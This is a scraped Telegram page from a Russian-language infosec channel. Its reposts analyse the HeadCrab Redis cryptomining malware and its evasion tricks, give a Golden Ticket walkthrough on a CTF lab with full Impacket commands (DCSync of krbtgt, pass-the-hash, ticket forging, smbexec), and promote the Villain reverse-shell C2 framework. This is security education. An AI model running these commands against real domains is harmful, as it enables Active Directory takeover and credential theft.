Fsecurity | HH
رفتن به کانال در Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
نمایش بیشتر2 009
مشترکین
اطلاعاتی وجود ندارد24 ساعت
-27 روز
-1230 روز
آرشیو پست ها
2 010
Новый ролик уже на канале 🥳👇🏻
https://youtu.be/wlYFkBT6Ca8?si=9l76aEeVTnSN0CAn
Приятного просмотра 👾
2 010
Хочу также посоветовать:
1 - Проверить себя на утечки! 💧
2 - Наш discord сервер! Где можно пообщаться 👾
3 - Мой Github 🦑
Наш второй канал [Ximera-Chan]
2 010
Repost from PurpleBear
REDIScovering HeadCrab - A Technical Analysis of a Novel Malware and the Mind Behind It
Так звучит название отличного доклада про анализ малвари HeadCrab от slave (стало не политкорректно с версии
Aqua Security на BlackHat EU 2023. Содержание представляет собой детальное исследование HeadCrab, который использовался для атак на сервера Redis c целью майнинга криптовалюты.
🔴 Initial Assess
В качестве вектора для получения первоначального доступа злоумышленники использовали технику SLAVEOF/REPLICAOF из доклада крутого ресерчера Павла Топоркова aka Paul Axe на ZeroNights 2018❤️ Редис имеет функциональность, которая заключается в создании копии данных на другом сервере, с помощью redis-cli replicaof <master_host> <master_port>. Так злодей, который получил доступ к серверу без protected mode, с помощью подбора слабых учетных данных, имеет возможность подключить его как Redis 5.0) т.е replica к своему мастер-серверу и получить таким образом возможность RCE
🔴 Exploitation
Далее на атакуемый сервер устанавливается Redis модуль - Loader.so в версии HeadCrab2.0, который загружает основную малварь HeadCrab.so в memfd (Memory File Descriptor) т.е в RAM, не оставляю следов на диске
🔴 C2/Defense Evasion
Загруженный основной модуль перезаписывает дефолтные команды Redis overwrite_command ("replicaof", qword_245788, 0LL, 0LL, invalid_command_err_3) чтобы затруднить идентификацию и избавиться от конкурентов
🔴 Post Exploitation
Далее устанавливается XMRig для майнинга криптовалюты Monero
🔴 Persistence/Defense Evasion
☑️ Создаются переменные окружения для перетирания shell history - HISTFILE=/dev/null
☑️ Удаление логов, при этом интересно, что логи не просто сносятся, а изменяется размер файлов - truncate ("/var/log/redis/redis.log", 0LL)
☑️ Сокрытие конфигов в атрибутах, вместо создания файлов на диске - return setxattr(path, "trusted.cfg", v5, 0x18uLL, 0)
☑️ Исполнение Lua скриптов в памяти
☑️ Использование ld.so как LOTL лоадер
☑️ Использование Files Timestomping, для затруднения расследования инцидента
☑️ Использование inotify для затруднения расследования инцидента (inotify для "proc/%d/stat", например для top просто отключает майнер, а "dev/pts/%s" для pty сессий ssh)
🔴 Credential Access/Defense Evasion
Далее таким же образом загружается малварь ice9j для сбора кредов во время аутентификации для SSHd, FTPd, Maild и SQLd (предположительно в разработке) с использованием различных техник от ptrace до манипуляций с /proc/$pid/mem
Использование anti-debugging техник и fanotify для затруднения расследования инцидента
Интересный факт, что исследователи общались с автором малвари, который(ая) представился ice9 по электронной почте, который охотно взаимодействовал и даже поблагодарил ресерчеров за проявленный интерес "Thanks, you are the first one who wrote to this email"🤪
PS: Желаю всем удачного окончания недели и отличных выходных!2 010
Repost from Purple Chronicles
🎫Немного о Golden Ticket🎫
Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩💻:
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!
Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️
Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.
Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.
Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!
apt install python3-impacket
После обновления выпустить золотой билет можно следующей командой:
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser
При этом обратная совместимость со старым PAC так же останется:
python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username
Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:
# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4
# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt
# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute
# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova
# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts
# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass
Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova!2 010
🎃 Villain - это фреймворк C2, который может обрабатывать несколько TCP-сокетов и обратных оболочек на основе HoaxShell, расширять их функциональность с помощью дополнительных функций и делиться ими между подключенными серверами.
🔎 Основные функции фреймворка включают в себя:
⏺Генерация полезной нагрузки
Динамически задействованная подсказка псевдооболочки
⏺Загрузка файлов (через http),
⏺Автозапрос http и скрипты exec для сеансов
⏺Командный чат
⏺Защитник сеанса
↘️ Github
#tool // nsis
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
